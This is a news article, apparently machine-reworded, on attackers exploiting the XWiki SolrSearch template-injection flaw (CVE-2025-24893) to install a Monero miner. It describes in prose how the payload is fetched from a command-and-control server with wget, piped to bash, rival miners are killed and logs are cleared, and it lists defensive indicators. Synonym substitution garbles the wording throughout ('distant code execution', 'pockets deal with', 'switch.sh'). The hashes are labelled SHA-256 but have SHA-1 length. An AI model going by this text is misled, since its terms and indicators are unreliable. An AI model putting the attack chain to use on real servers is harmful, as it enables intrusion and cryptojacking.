A essential distant code execution (RCE) flaw in XWiki, a preferred open-source wiki platform, was exploited within the wild to deploy cryptocurrency mining malware on compromised servers.
The vulnerability, tracked as CVE-2025-24893, permits unauthenticated attackers to inject malicious templates and execute arbitrary code, bypassing authentication solely.
This discovery highlights the rising menace to net purposes, the place real-world assaults typically outpace official alerts from our bodies like CISA’s Recognized Exploited Vulnerabilities (KEV) catalog.
VulnCheck, a vulnerability intelligence agency, reported the exploitation based mostly on information from their Canary community, which simulates weak programs to detect assaults.
In contrast to earlier stories from Cyble, Shadow Server, and CrowdSec that famous mere exploit makes an attempt, VulnCheck’s observations reveal a classy two-stage assault chain originating from an IP deal with in Vietnam.
The flaw, added to VulnCheck KEV in March 2025, entails template injection in XWiki’s SolrSearch endpoint, enabling attackers to run Groovy scripts for command execution.
This absence from CISA KEV underscores how exploitation can surge earlier than formal recognition, leaving organizations uncovered.
The Two-Stage Exploitation Course of
The assault unfolds in two phases, separated by at the very least 20 minutes, to evade detection.
Within the preliminary request, attackers ship a URL-encoded GET to the SolrSearch endpoint, injecting an asynchronous Groovy payload that makes use of wget to obtain a downloader script named x640 from a command-and-control (C2) server at 193.32.208.24:8080.
This script saves to /tmp/11909 on the goal system. The payload mimics professional browser visitors with a Firefox consumer agent to mix in.
Roughly 20 minutes later, a second request executes the staged file by invoking bash on /tmp/11909. The downloader then fetches two further scripts, x521 and x522, piping them on to bash for execution, VulnCheck stated.
These scripts deal with the payload supply: x521 creates directories in /var/tmp, downloads the coinminer binary tcrond from the identical C2, and units executable permissions.
In the meantime, x522 cleans the atmosphere by killing competing miners like xmrig and kinsing, clears historical past logs, and launches tcrond with a configuration pointing to auto.c3pool.org on port 80.
The miner, UPX-packed for obfuscation, makes use of a Monero pockets deal with for payouts, indicating a low-sophistication however persistent operation.
All visitors traces again to 123.25.249.88, flagged in a number of AbuseIPDB stories for abusive exercise.
Key Indicators
Defenders can use these indicators to hunt for related exercise throughout networks. The exploitation leverages switch.sh for internet hosting payloads, a typical tactic in cryptojacking campaigns.
Indicator TypeDetailsIP Addresses123.25.249.88 (Attacker, Vietnam); 193.32.208.24 (C2 Server)File Hashes (SHA-256)tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10; tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b; x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed; x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f; x640: 5abc337dbc04fee7206956dad1e0b6d43921a868CVSS Score9.8 (Vital) – Unauthenticated RCE by way of template injection in XWiki variations prior to fifteen.10.6Affected ProductsXWiki Enterprise, XWiki Commonplace; Impacts net servers operating weak cases
Organizations utilizing XWiki ought to patch instantly to model 15.10.6 or later, monitor for anomalous wget visitors, and scan for these IOCs.
VulnCheck’s Canaries reveal the worth of proactive menace intelligence in bridging gaps left by delayed official listings.
Comply with us on Google Information, LinkedIn, and X for each day cybersecurity updates. Contact us to characteristic your tales.
